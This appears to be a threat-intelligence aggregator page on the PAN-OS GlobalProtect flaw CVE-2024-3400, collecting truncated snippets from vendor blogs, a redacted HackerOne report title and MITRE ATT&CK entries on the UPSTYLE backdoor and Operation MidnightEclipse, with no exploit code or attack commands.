Discover how it began and where it’s going
Meet o
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future
2025 Cloud Threat Hunting and Defense Landscape
# 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security ga
Greynoiseio
CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS
blogs_greynoiseio·CVSS 10.0
[CRITICAL] CVE-2024-3400: Command Injection Vulnerability in Palo Alto Networks PAN-OS
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Recorded Future
RedNovember Targets Government, Defense, and Technology Organizations
blogs_recorded_future
RedNovember Targets Government, Defense, and Technology Organizations
# RedNovember Targets Government, Defense, and Technology Organizations
Note: The analysis cut-off date for this report was July 25, 2025
## Executive Summary
In July 2024, Insikt Group publicly reported on TAG-100, a threat activity group conducting suspected cyber-espionage activity targeting high-profile government, intergovernmental, and private sector organizations globally using the open-source, multi-platform Go backdoor Pantegana. At the time, we did not attribute this activity to a particular country; however, after reviewing all available evidence, we assess that TAG-100 is highly likely a Chinese state-sponsored threat activity group. Accordingly, Insikt Group now tracks this group under the designation RedNovember.
Between June 2024 and July 2025, RedNovember (which overlap
Zscaler
CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report | CXO Revolutionaries
blogs_zscaler
CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report | CXO Revolutionaries
## CISO Monthly Roundup, May 2024: Operation Endgame, Anatsa malware, HijackLoader, and the Zscaler ThreatLabz 2024 VPN Risk Report
Deepen Desai
Contributor
Zscaler
## Jun 7, 2024
ThreatLabz research on Operation Endgame, Anatsa malware, and HijackLoader. The Zscaler ThreatLabz 2024 VPN Risk Report. Zenith Live 24.
The CISO Monthly Roundup provides the latest threat research from the ThreatLabz team, along with CISO insights on cyber-related subjects. Over the past month ThreatLabz assisted with Operation Endgame, analyzed an Anatsa campaign, examined HijackLoader updates, and released a VPN risk report.
## Operation Endgame extinguishes Smoke
Smoke (a.k.a. SmokeLoader, Dofoil) is a malware that has been plaguing organizations since 2011. Threat actors typically use Smoke to delive
Recorded Future
TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
blogs_recorded_future·CVSS 10.0
[CRITICAL] TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
# TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
Summary
Recorded Future’s Insikt Group identified a suspected cyber-espionage campaign by TAG-100, targeting global government and private sector organizations. TAG-100 exploited internet-facing devices and used open-source tools like the Go backdoor Pantegana. The campaign compromised two Asia-Pacific intergovernmental organizations and targeted multiple diplomatic and trade entities.
### TAG-100 Uses Open-Source Tools in Suspected Global Espionage Campaign, Compromising Two Asia-Pacific Intergovernmental Bodies
TAG-100 employs open-source remote access capabilities and exploits various internet-facing devices to gain initial access. This activity highlights
HackerOne
GlobalProtect - OS Command Injection #█████████
hackerone·2026-01-12·CVSS 10.0
[CRITICAL] GlobalProtect - OS Command Injection #█████████
GlobalProtect - OS Command Injection #█████████
**Description:**
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
## References
- https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-CVE-2024-3400/
- https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-3400
## Impact
GlobalProtect - OS Command Injection
## System Host(s)
██████
## Affected Product(s) and Version(s)
## CVE Numbers
## Steps to R
ATT&CK
UPSTYLE
mitre_attack·CVSS 10.0
CVE-2024-3400 [CRITICAL] UPSTYLE
UPSTYLE
[UPSTYLE](https://attack.mitre.org/software/S1164) is a Python-based backdoor associated with exploitation of Palo Alto firewalls using CVE-2024-3400 in early 2024. [UPSTYLE](https://attack.mitre.org/software/S1164) has only been observed in relation to this exploitation activity, which involved attempted install on compromised devices by the threat actor UTA0218.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
ATT&CK
Operation MidnightEclipse
mitre_attack·CVSS 10.0
CVE-2024-3400 [CRITICAL] Operation MidnightEclipse
Operation MidnightEclipse
[Operation MidnightEclipse](https://attack.mitre.org/campaigns/C0048) was a campaign conducted in March and April 2024 that involved initial exploit of zero-day vulnerability CVE-2024-3400, a critical command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS.(Citation: Volexity UPSTYLE 2024)(Citation: Palo Alto MidnightEclipse APR 2024)
Aliases: Operation MidnightEclipse
https://security.paloaltonetworks.com/CVE-2024-3400https://unit42.paloaltonetworks.com/cve-2024-3400/https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/https://security.paloaltonetworks.com/CVE-2024-3400https://unit42.paloaltonetworks.com/cve-2024-3400/https://www.paloaltonetworks.com/blog/2024/04/more-on-the-pan-os-cve/https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2024-3400
2024-04-12
Published
2024-04-12
Added to CISA KEV
Exploited in the wild